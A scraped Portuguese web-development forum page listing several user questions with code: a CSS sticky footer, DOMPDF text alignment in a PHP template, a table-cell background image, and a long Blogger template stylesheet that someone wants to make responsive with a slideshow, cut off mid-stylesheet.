-
Similar Content
-
By PedroHRLeite
Estou querendo deixar um rodapé fixo no topo a medida que o mesmo alcança o topo da página, porém estou encontrando dificuldades ao utilizar position: sticky, segue o código completo, se eu colocar a configuração de sticky na classe .side-column funciona bem, porém quero apenas no footer, alguém saber como resolver?
<!DOCTYPE html> <html> <head> <style> .wideBody .side-column { float: right; order: 2; width: 300px; } .wideBody .side-column footer { position: sticky; position: -webkit-sticky; top: 0; } .wideBody .main-column { align-self: flex-start; float: left; width: 500px; border: 2px solid #4CAF50; } .resultados { border: 2px solid #4CAF50; margin-bottom:25px; position:relative; } footer { border: 2px solid #4CAF50; } </style> </head> <body class="wideBody"> <main> <div> <div class="main-column"> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> coluna principal<br /> </div> <aside class="side-column"> coluna auxiliar <div class="resultados"> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> 1 -> 2<br /> </div> <footer> rodape fixo </footer> </aside> </div> </main> </body> </html>
-
By Vanderson Bilck Barbosa
Boa tarde;
Busco ajuda com um assunto não muito comum e que já esta me tirando o sono a 2 dias....
Estou gerando PDFs com o DOMPDF, porém alguns itens que são cadastrados no banco via TextArea não se alinham conforme o restante dos demais.
*** Ressalto que já tentei todas as formas de alinhamento CSS possíveis, tanto diretamente no item quanto no css integrado, limpei os itens no textarea (https://summernote.org/) que são adicionados automático (exemplo: <p></p> ).
1 - Arquivo que busca o arquivo já renderizado .php.
<?php
use Dompdf\Dompdf;
$dompdf = new Dompdf(["enable_remote" => true]);
$dompdf->setPaper('A4', 'portrait');
ob_start();
require "views/adm/ordemdeproducao.php";
$dompdf->loadHtml(ob_get_clean());
$datagera = date('dmY-His');
$dompdf->render();
$dompdf->stream("OrdemProducao_$datagera.pdf", array("Attachment" => false));
2 - trecho do Arquivo que é chamado pelo anterior
<tr style="background-color: #FFFFFF;">
<td>
<table>
<tr>
<td class="bglaranja1 th titReceita">
<b>RECEITA:</b> <i><?php echo $receita->gettitulo(); ?></i>
</td>
</tr>
</table>
<table>
<thead>
<tr>
<th class="th" width="60">ITEM</th>
<th class="th">PRODUTO</th>
<th class="th" width="60">UN</th>
<th class="th" width="60">QTDE</th>
</tr>
</thead>
<tbody>
<?php
$receitaItem = new Receita();
$itensReceita = $receitaItem->getProdutoReceita(array($receita->gettoken()));
foreach ($itensReceita as $itemCalc) {
?>
<tr class="small">
<td class="text-center td"><?php echo $itemCalc["id_produto"]; ?></td>
<td class="td"><?php echo $itemCalc["nome_produto"]; ?></td>
<td class="text-center td"><?php echo $itemCalc["um_produto"]; ?></td>
<td class="text-center td"><?php echo number_format(intval($valueCardapio["quantidade"]) * floatval($itemCalc["quantidade"]), 0, '', '.'); ?></td>
</tr>
<?php } ?>
</tbody>
</table>
<table style="background-color: #FFFFFF;">
<tr>
<td class="td small" valign="top">
<p style="left: 0; text-align: left; margin-left: 0; border: 1px solid #FF0000;">
<b>MATERIAIS DA RECEITA</b><br />
<?php echo $receita->getmateriais(); ?> //item que não se alinha (left) como os demais
</p>
</td>
</tr>
</table>
<table>
<tr>
<td class="td small" valign="top" style="background-color: #FFFFFF;">
<p style="left: 0; text-align: left; margin-left: 0; border: 1px solid #FF0000;">
<b>MODO DE PREPARO</b><br />
<?php echo $receita->getmodo_preparo(); ?> //item que não se alinha (left) como os demais
</p>
</td>
<td class="td small" valign="top" style="background-color: #FFFFFF; width: 160px;">
<b>FOTO DA RECEITA</b><br />
<?php if ($receita->gettoken_img() == null) { ?>
<div class="image_receita" style="background-image: url('<? echo $urlFora;?>/views/adm/res/img/noimage-300.jpg')"></div>
<?php } else { ?>
<div class="image_receita" style="background-image: url('<? echo $urlFora;?>/img/<?php echo $receita->gettoken_img(); ?>/0/1')"></div>
<?php } ?>
</td>
</tr>
</table>
<table class="mb-1">
<tr>
<td class="td small">
<b>Tempo de Preparo:</b> <?php echo $receita->gettempo_preparo(); ?> Minutos</td>
<td class="td small">
<b>Rendimento:</b> <?php echo $receita->getrendimento(); ?>
</td>
</tr>
<tr>
<td class="td small">
<b>Tipo da Porção:</b>
<?php
$porcao = new Porcao();
$porcao->loadByIdAtivo($receita->gettb_porcao_id());
echo $porcao->getmedida_caseira();
?>
</td>
<td class="td small">
<b>Medida da Porção (gramas): <?php echo $receita->getvalor_porcao(); ?></b>
</td>
</tr>
</table>
</td>
</tr>
3 - arquivo gerado em pdf (Imagem Anexo) - Itens vermelhos, são os mesmos comentados no fonte acima //item que não se alinha (left) como os demais
-
By jacquesvaladares
Como inserir uma imagem como background em uma célula de tabela. Fiz um exemplo simples q apresento abaixo.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type"
content="text/html; charset=ISO-8859-1">
<title>Teste de imagem na celula da tabela</title>
<!--– I N I C I O C S S –-->
<style type="" text/css="">
.imagem{
background: url(liz.png) no repeat;
}
</style><!--– F I M C S S –-->
</head>
<body>
<table
style="width: 100%; height: 450px; text-align: left; margin-left: auto; margin-right: auto;"
border="2" cellpadding="2" cellspacing="2">
<tbody>
<tr>
<td style="height: 50%; width: 50%;"><class
="imagem"></class></td>
<td
style="height: 50%; width: 50%; background-color: rgb(255, 255, 204);"></td>
</tr>
<tr>
<td
style="height: 50%; width: 50%; background-color: rgb(51, 102, 255);"></td>
<td
style="height: 50%; width: 50%; background-color: rgb(51, 255, 51);"></td>
</tr>
</tbody>
</table>
<br>
</body>
</html>
-
By bruno28121
Bom dia a todos , gostaria de saber como posso colocar um slide dentro destes codigos , e um tema usado no template bloguer.
Preciso deixar ele responsivo para mobile , e colocar slide rodando nele com 5 imagens .
Como faço isso ?
Segue os codigos abaixo.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html b:css='false' b:defaultwidgetversion='2' b:layoutsVersion='3' b:responsive='true' b:templateVersion='1.0.0' expr:class='data:blog.languageDirection' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<meta content='width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1' name='viewport'/>
<title><data:view.title.escaped/></title>
<b:include data='blog' name='all-head-content'/>
<script type='application/ld+json'>{"@context":"http://schema.org","@type":"WebSite","name":"<data:view.title.escaped/>","url":"<data:view.url.canonical/>","potentialAction":{"@type":"SearchAction","target":"<data:view.url.canonical/>search?q={search_term_string}","query-input":"required name=search_term_string"}}</script>
<!-- Google Fonts -->
<link href='//fonts.googleapis.com/css?family=Quicksand:400,500,600,700|Poppins:400,400i,500,500i,700,700i' media='all' rel='stylesheet' type='text/css'/>
<link href='https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' rel='stylesheet'/>
<!-- Template Style CSS -->
<b:skin version='1.0.0'><![CDATA[/*
-----------------------------------------------
Blogger Template Style
Name: Kovid
License: Free Version
Version: 1.0
Author: Sora Templates
Author Url: https://www.soratemplates.com/
----------------------------------------------- */
/*
<!-- Variable definitions -->
<Variable name="keycolor" description="Main Color" type="color" hideEditor="true" default="$(main.color)" value="#e7015e"/>
<Variable name="followByEmail" description="Follow By Email Text" type="string" hideEditor="true" default="Get all latest content delivered straight to your inbox." value="Get all latest content delivered straight to your inbox."/>
<Group description="Theme Colors" selector="body">
<Variable name="main.color" description="Theme Color" type="color" default="#e7015e" value="#e7015e"/>
<Variable name="dark.color" description="Dark Color" type="color" default="#222222" value="#222222"/>
<Variable name="dark.color.two" description="Second Dark Color" type="color" default="#121158" value="#121158"/>
<Variable name="main.menu.color" description="Main Menu Color" type="color" default="#ffffff" value="#ffffff"/>
<Variable name="body.text.color" description="Text Color" type="color" default="#888888" value="#888888"/>
<Variable name="body.text.two" description="Second Text Color" type="color" default="#515184" value="#515184"/>
<Variable name="title.color" description="Title Color" type="color" default="#222222" value="#222222"/>
</Group>
<Group description="Intro Section" selector="#main-intro">
<Variable name="intro.title" description="Intro Title Color" type="color" default="#ffffff" value="#ffffff"/>
<Variable name="intro.text" description="Intro Text Color" type="color" default="#bbbbbb" value="#bbbbbb"/>
</Group>
<!-- Extra Variables -->
<Variable name="body.background.color" description="Body background color" hideEditor="true" type="color" default="#f8f8f8" value="#f8f8f8"/>
<Variable name="head.color" description="Header background color" hideEditor="true" type="color" default="#ffffff" value="#ffffff"/>
<Variable name="body.background" description="Background" hideEditor="true" type="background" color="#f8f8f8" default="$(color) url() repeat scroll top left" value="$(color) url() repeat scroll top left"/>
<Variable name="body.link.color" description="Body Link Color" hideEditor="true" type="color" default="$(main.color)" value="#e7015e"/>
<Variable name="body.text.font" description="Font" hideEditor="true" type="font" default="14px Poppins, sans-serif" value="14px Poppins, sans-serif"/>
<Variable name="posts.background.color" description="Post background color" hideEditor="true" type="color" default="#f8f8f8" value="#f8f8f8"/>
<Variable name="tabs.font" description="Font 2" hideEditor="true" type="font" default="14px Poppins, sans-serif" value="14px Poppins, sans-serif"/>
<Variable name="posts.title.color" description="Post title color" hideEditor="true" type="color" default="#111111" value="#111111"/>
<Variable name="posts.text.color" description="Post text color" hideEditor="true" type="color" default="#5E5E5E" value="#5E5E5E"/>
<Variable name="posts.icons.color" description="Post icons color" hideEditor="true" type="color" default="$(main.color)" value="#e7015e"/>
<Variable name="labels.background.color" description="Label background color" hideEditor="true" type="color" default="$(main.color)" value="#e7015e"/>
<Variable name="footer.dark.color" description="Footer background color" hideEditor="true" type="color" default="#20222d" value="#20222d"/>
*/
/*-- Reset CSS --*/
/* PRELOADER */
#loader {
position: fixed;
top: 0;
bottom: 0;
margin: auto;
background: #fff;
height: 100%;
width: 100%;
z-index: 99999;
}
#stringPreloader {
position: fixed;
top: 0;
bottom: 0;
left: 0;
right: 0;
margin: auto;
}
#stringPreloader {
-webkit-animation: spinner 2.5s infinite linear;
animation: spinner 2.5s infinite linear
}
@-webkit-keyframes spinner {
0% {
-webkit-transform: rotate(0);
transform: rotate(0)
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg)
}
}
@keyframes spinner {
0% {
-webkit-transform: rotate(0);
transform: rotate(0)
}
100% {
-webkit-transform: rotate(360deg);
transform: rotate(360deg)
}
}
a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,font,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{
padding:0;
border:0;
outline:0;
vertical-align:baseline;
background:0 0;
text-decoration:none
}
form,textarea,input,button{
-webkit-appearance:none;
-moz-appearance:none;
appearance:none;
border-radius:0
}
dl,ul{
list-style-position:inside;
font-weight:400;
list-style:none
}
ul li{
list-style:none
}
caption,th{
text-align:center
}
img{
border:none;
position:relative
}
a,a:visited{
text-decoration:none
}
.clearfix{
clear:both
}
.section,.widget,.widget ul{
margin:0;
padding:0
}
a{
color:$(main.color)
}
a:hover{
color:$(title.color)
}
a img{
border:0
}
abbr{
text-decoration:none
}
.CSS_LIGHTBOX{
z-index:999999!important
}
.separator a{
clear:none!important;
float:none!important;
margin-left:0!important;
margin-right:0!important
}
#navbar-iframe,.widget-item-control,a.quickedit,.home-link,.feed-links{
display:none!important
}
.center{
display:table;
margin:0 auto;
position:relative
}
.widget > h2,.widget > h3{
display:none
}
h1,h2,h3,h4,h5,h6 {font-family:'Quicksand', sans-serif;font-weight:700;}
/*-- Body Content CSS --*/
body{
background-color:#fff;
font-family:'Poppins',sans-serif;
font-size:14px;
font-weight:400;
color:$(body.text.color);
word-wrap:break-word;
margin:0;
padding:0
}
.row{
width:1000px
}
#content-wrapper{
float:left;
width:100%;
margin:68px 0
}
.home #content-wrapper {
margin:35px 0;
}
.item #content-wrapper{
margin:40px 0
}
#content-wrapper > .container{
position:relative;
margin:0 auto
}
#main-wrapper{
overflow:hidden;
padding:0;
margin:0 -7px
}
.item #main-wrapper{
margin:0;
float: left;
overflow: hidden;
width: 66.66666667%;
box-sizing: border-box;
word-wrap: break-word;
padding: 0 15px;
margin: 0;
}
#sidebar-wrapper{
display:none;
float: right;
overflow: hidden;
width: 33.33333333%;
box-sizing: border-box;
word-wrap: break-word;
padding: 0 15px;
}
.item #sidebar-wrapper {
display:block;
}
.sidebar .widget{
position:relative;
overflow:hidden;
background-color:#fff;
box-sizing:border-box;
padding:0;
margin:0 0 35px
}
.sidebar .widget-title{
position:relative;
float:left;
width:100%;
height:32px;
background-color:#f0f0f0;
display:block;
margin:0 0 20px
}
.sidebar .widget-title > h3{
position:relative;
display:block;
height:32px;
font-size:12px;
color:#333333;
font-weight:700;
line-height:32px;
text-align:center;
text-transform:uppercase;
padding:0 15px;
margin:0;
border-radius:2px 2px 0 0
}
.sidebar .widget-content{
float:left;
width:100%;
margin:0
}
.list-label li{
position:relative;
display:block;
padding:8px 0;
border-top:1px dotted #eaeaea
}
.list-label li:first-child{
padding:0 0 8px;
border-top:0
}
.list-label li:last-child{
padding-bottom:0;
border-bottom:0
}
.list-label li a{
display:block;
color:$(title.color);
font-size:13px;
font-weight:400;
text-transform:capitalize;
transition:color .17s
}
.list-label li a:before{
content:"\f105";
float:left;
color:$(title.color);
font-size:12px;
font-weight:400;
font-family:FontAwesome;
margin:0 3px 0 0;
transition:color .17s
}
.list-label li a:hover{
color:$(main.color)
}
.list-label .label-count{
position:relative;
float:right;
font-weight:400
}
.cloud-label li{
position:relative;
float:left;
margin:0 5px 5px 0
}
.cloud-label li a{
display:block;
height:26px;
background-color:#fff;
color:$(title.color);
font-size:12px;
line-height:26px;
font-weight:400;
padding:0 10px;
border:1px solid #eaeaea;
border-radius:3px;
transition:all .17s ease
}
.cloud-label li a:hover{
color:$(main.color)
}
.cloud-label .label-count{
display:none
}
.sidebar .FollowByEmail > .widget-title > h3{
margin:0
}
.FollowByEmail .widget-content{
position:relative;
overflow:hidden;
background-color:$(main.color);
font-weight:400;
text-align:center;
box-sizing:border-box;
padding:20px
}
.FollowByEmail .widget-content > h3{
font-size:18px;
color:#fff;
font-weight:700;
margin:0 0 13px
}
.FollowByEmail .before-text{
font-size:13px;
color:#fff;
line-height:1.4em;
margin:0 0 15px;
display:block;
padding:0 15px;
overflow:hidden
}
.FollowByEmail .follow-by-email-inner{
position:relative
}
.FollowByEmail .follow-by-email-inner .follow-by-email-address{
width:100%;
height:34px;
color:#888;
font-size:11px;
font-family:inherit;
text-align:center;
padding:0 10px;
margin:0 0 10px;
box-sizing:border-box;
border:1px solid #eaeaea;
transition:ease .17s
}
.FollowByEmail .follow-by-email-inner .follow-by-email-address:focus{
border-color:rgba(0,0,0,0.1)
}
.FollowByEmail .follow-by-email-inner .follow-by-email-submit{
width:100%;
height:34px;
font-family:inherit;
font-size:11px;
color:#fff;
background-color:$(dark.color);
text-transform:uppercase;
text-align:center;
font-weight:700;
cursor:pointer;
margin:0;
border:0;
transition:opacity .17s
}
.FollowByEmail .follow-by-email-inner .follow-by-email-submit:hover{
opacity:.8
}
#ArchiveList ul.flat li{
color:$(title.color);
font-size:13px;
font-weight:400;
padding:8px 0;
border-bottom:1px dotted #eaeaea
}
#ArchiveList ul.flat li:first-child{
padding-top:0
}
#ArchiveList ul.flat li:last-child{
padding-bottom:0;
border-bottom:0
}
#ArchiveList .flat li > a{
display:block;
color:$(title.color);
transition:color .17s
}
#ArchiveList .flat li > a:hover{
color:$(main.color)
}
#ArchiveList .flat li > a:before{
content:"\f105";
float:left;
color:$(title.color);
font-size:12px;
font-weight:400;
font-family:FontAwesome;
margin:0 3px 0 0;
display:inline-block;
transition:color .17s
}
#ArchiveList .flat li > a > span{
position:relative;
float:right;
font-weight:400
}
.PopularPosts .post{
overflow:hidden;
margin:20px 0 0
}
.PopularPosts .post:first-child{
margin:0
}
.PopularPosts .post-image-link{
position:relative;
width:80px;
height:65px;
float:left;
overflow:hidden;
display:block;
vertical-align:middle;
margin:0 12px 0 0
}
.PopularPosts .post-info{
overflow:hidden
}
.PopularPosts .post-title{
font-size:14px;
font-weight:500;
line-height:1.4em;
margin:0 0 5px
}
.PopularPosts .post-title a{
display:block;
color:$(title.color);
transition:color .17s
}
.PopularPosts .post-title a:hover{
color:$(main.color)
}
.PopularPosts .post-meta{
font-size:11px
}
.PopularPosts .post-date:before{
font-size:10px
}
.FeaturedPost .post-image-link{
display:block;
position:relative;
overflow:hidden;
width:100%;
height:180px;
margin:0 0 13px
}
.FeaturedPost .post-title{
font-size:18px;
overflow:hidden;
font-weight:500;
line-height:1.4em;
margin:0 0 10px
}
.FeaturedPost .post-title a{
color:$(title.color);
display:block;
transition:color .17s ease
}
.FeaturedPost .post-title a:hover{
color:$(main.color)
}
.Text{
font-size:13px
}
.contact-form-widget form{
font-weight:400
}
.contact-form-name{
float:left;
width:100%;
height:30px;
font-family:inherit;
font-size:13px;
line-height:30px;
box-sizing:border-box;
padding:5px 10px;
margin:0 0 10px;
border:1px solid #eaeaea
}
.contact-form-email{
float:left;
width:100%;
height:30px;
font-family:inherit;
font-size:13px;
line-height:30px;
box-sizing:border-box;
padding:5px 10px;
margin:0 0 10px;
border:1px solid #eaeaea
}
.contact-form-email-message{
float:left;
width:100%;
font-family:inherit;
font-size:13px;
box-sizing:border-box;
padding:5px 10px;
margin:0 0 10px;
border:1px solid #eaeaea
}
.contact-form-button-submit{
float:left;
width:100%;
height:30px;
background-color:$(main.color);
font-size:13px;
color:#fff;
line-height:30px;
cursor:pointer;
box-sizing:border-box;
padding:0 10px;
margin:0;
border:0;
transition:background .17s ease
}
.contact-form-button-submit:hover{
background-color:$(dark.color)
}
.contact-form-error-message-with-border{
float:left;
width:100%;
background-color:#fbe5e5;
font-size:11px;
text-align:center;
line-height:11px;
padding:3px 0;
margin:10px 0;
box-sizing:border-box;
border:1px solid #fc6262
}
.contact-form-success-message-with-border{
float:left;
width:100%;
background-color:#eaf6ff;
font-size:11px;
text-align:center;
line-height:11px;
padding:3px 0;
margin:10px 0;
box-sizing:border-box;
border:1px solid #5ab6f9
}
.contact-form-cross{
margin:0 0 0 3px
}
.contact-form-error-message,.contact-form-success-message{
margin:0
}
.BlogSearch .search-input{
float:left;
width:75%;
height:30px;
background-color:#fff;
font-weight:400;
font-size:13px;
line-height:30px;
box-sizing:border-box;
padding:5px 10px;
border:1px solid #eaeaea;
border-right-width:0
}
.BlogSearch .search-action{
float:right;
width:25%;
height:30px;
font-family:inherit;
font-size:13px;
line-height:30px;
cursor:pointer;
box-sizing:border-box;
background-color:$(main.color);
color:#fff;
padding:0 5px;
border:0;
transition:background .17s ease
}
.BlogSearch .search-action:hover{
background-color:$(dark.color)
}
.Profile .profile-img{
float:left;
width:80px;
height:80px;
margin:0 15px 0 0;
transition:all .17s ease
}
.Profile .profile-datablock{
margin:0
}
.Profile .profile-data .g-profile{
display:block;
font-size:14px;
color:$(title.color);
margin:0 0 5px;
transition:color .17s ease
}
.Profile .profile-data .g-profile:hover{
color:$(main.color)
}
.Profile .profile-info > .profile-link{
color:$(title.color);
font-size:11px;
margin:5px 0 0;
transition:color .17s ease
}
.Profile .profile-info > .profile-link:hover{
color:$(main.color)
}
.Profile .profile-datablock .profile-textblock{
display:none
}
.common-widget .LinkList ul li,.common-widget .PageList ul li{
width:calc(50% - 5px);
padding:7px 0 0
}
.common-widget .LinkList ul li:nth-child(odd),.common-widget .PageList ul li:nth-child(odd){
float:left
}
.common-widget .LinkList ul li:nth-child(even),.common-widget .PageList ul li:nth-child(even){
float:right
}
.common-widget .LinkList ul li a,.common-widget .PageList ul li a{
display:block;
color:$(title.color);
font-size:13px;
font-weight:400;
transition:color .17s ease
}
.common-widget .LinkList ul li a:hover,.common-widget .PageList ul li a:hover{
color:$(main.color)
}
.common-widget .LinkList ul li:first-child,.common-widget .LinkList ul li:nth-child(2),.common-widget .PageList ul li:first-child,.common-widget .PageList ul li:nth-child(2){
padding:0
}
.post-image-wrap{
position:relative;
display:block
}
.post-image-link:hover:after,.post-image-wrap:hover .post-image-link:after{
opacity:1
}
.post-image-link,.comments .avatar-image-container{
background-color:#f9f9f9
}
.post-thumb{
display:block;
position:relative;
width:100%;
height:100%;
color:transparent;
object-fit:cover;
z-index:1;
transition:opacity .17s ease
}
.widget-title > h3{
display:none
}
.faq-toggle {
color: $(dark.color);
background:#f0f0f0 url(https://1.bp.blogspot.com/-Gp_aSVPoEGw/Xs61pLjIBpI/AAAAAAAAIkM/f-KC5iXKIPgP0BLeWqMNbe07KkPkAivEgCK4BGAYYCw/s1600/covid-bg.png) center;
background-attachment: fixed;
padding: 30px 0;
}
.faq-toggle .container {
margin:0 auto;
}
.faq-toggle a {
cursor: pointer;
color: #4B4B4B;
text-decoration: none;
}
.faq-toggle .faq-title-sec {
margin-bottom: 40px;
text-align:center;
}
.faq-toggle .faq-title-sec h1 {
text-transform: uppercase;
text-align: center;
position: relative;
font-weight: 700;
letter-spacing: 10px;
font-size: 30px;
line-height: 1.5;
background: #FF9800;
margin: 0;
color: #fff;
padding: 10px 15px;
box-sizing: border-box;
}
.faq-toggle .faq-title-sec h1:before {
content: "";
width: 0;
height: 0;
position: absolute;
bottom: 0;
left: -10px;
border-right: 0;
border-left: 10px solid transparent;
border-top: 65px solid #ff9800;
}
.faq-toggle .faq-title-sec h1:after {
content: "";
width: 0;
height: 0;
position: absolute;
bottom: 0;
right: -10px;
border-left: 0;
border-right: 10px solid transparent;
border-top: 65px solid #ff9800;
}
.faq-toggle .faq-title-sec p {
text-align: center;
letter-spacing: 3px;
display: inline-block;
position:relative;
margin: 0;
color: #fefefe;
background: #9C27B0;
padding: 10px 10px;
box-sizing: border-box;
}
.faq-toggle .faq-title-sec p:before {
content: "";
width: 0;
height: 0;
position: absolute;
bottom: 0;
left: -10px;
border-right: 0;
border-left: 10px solid transparent;
border-bottom: 41px solid #9C27B0;
}
.faq-toggle .faq-title-sec p:after {
content: "";
width: 0;
height: 0;
position: absolute;
bottom: 0;
right: -10px;
border-left: 0;
border-right: 10px solid transparent;
border-bottom: 41px solid #9C27B0;
}
.faq-toggle span {
letter-spacing: 0px;
}
.faq-toggle p {
font-weight: 200;
line-height: 1.5;
font-size: 14px;
}
/* Styles for Accordion */
.faq-toggle .toggle {
background-color: rgba(33, 150, 243, 0.84);
border: 1px solid rgba(0,0,0,0.21);
border-bottom-color: rgba(0,0,0,0.34);
text-shadow: 0 1px 0 rgba(0,0,0,0.15);
box-shadow: 0 1px 0 rgba(255,255,255,0.34) inset, 0 2px 0 -1px rgba(0,0,0,0.13), 0 3px 0 -1px rgba(0,0,0,0.08), 0 3px 13px -1px rgba(0,0,0,0.21);
border-radius: 10px;
margin-bottom: 20px;
}
.toggle:last-child {
margin:0;
}
.toggle .toggle-title {
position: relative;
display: block;
}
.toggle .toggle-title h3 {
font-size: 16px;
margin: 0px;
line-height: 1.6;
cursor: pointer;
font-weight: 700;
text-transform:uppercase;
}
.toggle .toggle-inner {
padding: 7px 25px 10px 25px;
display: none;
margin: -7px 0 6px;
}
.toggle .toggle-inner div {
max-width: 100%;
}
.toggle .toggle-title .title-name {
display: block;
padding: 15px 25px;
box-sizing:border-box;
}
.toggle .toggle-title a i {
font-size: 22px;
margin-right: 5px;
}
.toggle .toggle-title i {
position: absolute;
background: url("https://4.bp.blogspot.com/-ygbxrw8NhQA/XHGJ5IWmT-I/AAAAAAAAGYA/6UiyG5LnnhM6iqhFI2EEGd8wgd1hln5ggCLcBGAs/s1600/plus_minus.png") 0px -24px no-repeat;
width: 24px;
height: 24px;
transition: all 0.3s ease;
margin: 15px;
right: 0;
}
.toggle .toggle-title.active i {
background: url("https://4.bp.blogspot.com/-ygbxrw8NhQA/XHGJ5IWmT-I/AAAAAAAAGYA/6UiyG5LnnhM6iqhFI2EEGd8wgd1hln5ggCLcBGAs/s1600/plus_minus.png") 0px 0px no-repeat;
}
#brand-services-wrap .widget-title {
text-align:center;
margin: 0 0 20px;
}
#brand-services-wrap .widget-title > h3 {
display: block;
font-size: 42px;
color: $(dark.color);
font-weight: 700;
}
.custom-widget li{
overflow:hidden;
margin:20px 0 0
}
.custom-widget li:first-child{
padding:0;
margin:0;
border:0
}
.custom-widget .post-image-link{
position:relative;
width:80px;
height:60px;
float:left;
overflow:hidden;
display:block;
vertical-align:middle;
margin:0 12px 0 0
}
.custom-widget .post-info{
overflow:hidden
}
.custom-widget .post-title{
overflow:hidden;
font-size:13px;
font-weight:400;
line-height:1.5em;
margin:0 0 3px
}
.custom-widget .post-title a{
display:block;
color:$(dark.color);
transition:color .17s
}
.custom-widget li:hover .post-title a{
color:$(main.color)
}
.custom-widget .post-meta{
font-size:12px
}
#top-bar{
width:100%;
padding:20px 0;
overflow:hidden;
margin:0;
}
#top-bar .container{
margin:0 auto
}
.top-bar-nav{
position:relative;
float:right;
display:block
}
.top-bar-nav .widget > .widget-title{
display:none
}
.top-bar-nav ul li{
float:left
}
.top-bar-nav ul li > a{
height:30px;
display:block;
color:#fff;
font-size:12px;
font-weight:400;
line-height:30px;
margin:0 0 0 10px;
padding:0 5px;
transition:color .17s
}
.top-bar-nav ul li:first-child > a{
padding:0 5px 0 0
}
.top-bar-nav ul > li:hover > a{
color:$(main.color)
}
.top-bar-social{
position:relative;
display:block;
margin: 8px 0 0;
text-align:center;
}
.top-bar-social .FollowByEmail {
max-width: 550px;
width: 100%;
margin: 0 auto;
}
.top-bar-social .FollowByEmail .widget-content {
background:transparent;
}
.top-bar-social .FollowByEmail .follow-by-email-inner .follow-by-email-address {
border-radius:10px;
height: 50px;
font-size: 15px;
}
.top-bar-social .FollowByEmail .follow-by-email-inner .follow-by-email-submit {
width:auto;
display: inline-block;
padding: 0 15px;
box-sizing: border-box;
border-radius: 30px;
background:$(main.color);
height: 45px;
font-size: 14px;
letter-spacing: 1px;
}
.top-bar-social .LinkList {
margin-top:15px;
}
.top-bar-social .widget-title > h3 {
display: block;
color: #f2f2f2;
font-size: 32px;
font-weight: 700;
margin: 0 0 15px;
}
.top-bar-social .LinkList > .widget-title{
display:none
}
.top-bar-social ul > li{
display:inline-block
}
.top-bar-social ul > li > a{
display:block;
width:30px;
height:30px;
border:1px solid rgba(158, 158, 158, 0.15);
color:#ffffff;
font-size:14px;
text-align:center;
line-height:30px;
padding:0;
margin:0 0 0 10px;
transition:all .17s ease;
border-radius:50%;
}
.top-bar-social ul > li:hover > a{
color:$(main.color)
}
.social a:before{
display:inline-block;
font-family:FontAwesome;
font-style:normal;
font-weight:400
}
.social .facebook a:before{
content:"\f230"
}
.social .facebook-f a:before{
content:"\f09a"
}
.social .twitter a:before{
content:"\f099"
}
.social .gplus a:before{
content:"\f0d5"
}
.social .rss a:before{
content:"\f09e"
}
.social .youtube a:before{
content:"\f16a"
}
.social .skype a:before{
content:"\f17e"
}
.social .stumbleupon a:before{
content:"\f1a4"
}
.social .tumblr a:before{
content:"\f173"
}
.social .vk a:before{
content:"\f189"
}
.social .stack-overflow a:before{
content:"\f16c"
}
.social .github a:before{
content:"\f09b"
}
.social .linkedin a:before{
content:"\f0e1"
}
.social .dribbble a:before{
content:"\f17d"
}
.social .soundcloud a:before{
content:"\f1be"
}
.social .behance a:before{
content:"\f1b4"
}
.social .digg a:before{
content:"\f1a6"
}
.social .instagram a:before{
content:"\f16d"
}
.social .pinterest a:before{
content:"\f0d2"
}
.social .pinterest-p a:before{
content:"\f231"
}
.social .twitch a:before{
content:"\f1e8"
}
.social .delicious a:before{
content:"\f1a5"
}
.social .codepen a:before{
content:"\f1cb"
}
.social .reddit a:before{
content:"\f1a1"
}
.social .whatsapp a:before{
content:"\f232"
}
.social .snapchat a:before{
content:"\f2ac"
}
.social .email a:before{
content:"\f0e0"
}
.social .external-link a:before{
content:"\f14c"
}
.social-color .facebook a,.social-color .facebook-f a{
background-color:#3b5999
}
.social-color .twitter a{
background-color:#00acee
}
.social-color .gplus a{
background-color:#db4a39
}
.social-color .youtube a{
background-color:#db4a39
}
.social-color .instagram a{
background-color:#bc3490
}
.social-color .pinterest a,.social-color .pinterest-p a{
background-color:#ca2127
}
.social-color .dribbble a{
background-color:#ea4c89
}
.social-color .linkedin a{
background-color:#0077b5
}
.social-color .tumblr a{
background-color:#365069
}
.social-color .twitch a{
background-color:#6441a5
}
.social-color .rss a{
background-color:#ffc200
}
.social-color .skype a{
background-color:#00aff0
}
.social-color .stumbleupon a{
background-color:#eb4823
}
.social-color .vk a{
background-color:#4a76a8
}
.social-color .stack-overflow a{
background-color:#f48024
}
.social-color .github a{
background-color:#24292e
